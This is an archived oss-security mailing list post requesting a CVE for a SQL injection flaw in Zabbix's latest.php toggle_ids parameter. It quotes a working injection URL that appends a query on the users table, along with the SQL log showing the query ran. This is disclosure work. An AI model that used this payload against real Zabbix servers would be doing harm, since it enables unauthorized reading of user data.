Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 12 Jan 2017 06:42:38 +0100
From: Salvatore Bonaccorso <carnil@...ian.org>
To: OSS Security Mailinglist <oss-security@...ts.openwall.com>
Subject: CVE Request: Zabbix: SQL injection vulnerabilities in "Latest data"

Hi

>From [1].
> Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection
> vulnerability due to a failure to sanitize input in the toggle_ids
> array in the latest.php page.
> 
> For example:
> latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
> 
> Result
> 
> SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
> latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185


 [1] https://support.zabbix.com/browse/ZBX-11023
 [2] https://bugs.debian.org/850936

Could you please assign a CVE for this zabbix issue.

Regards,
Salvatore

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ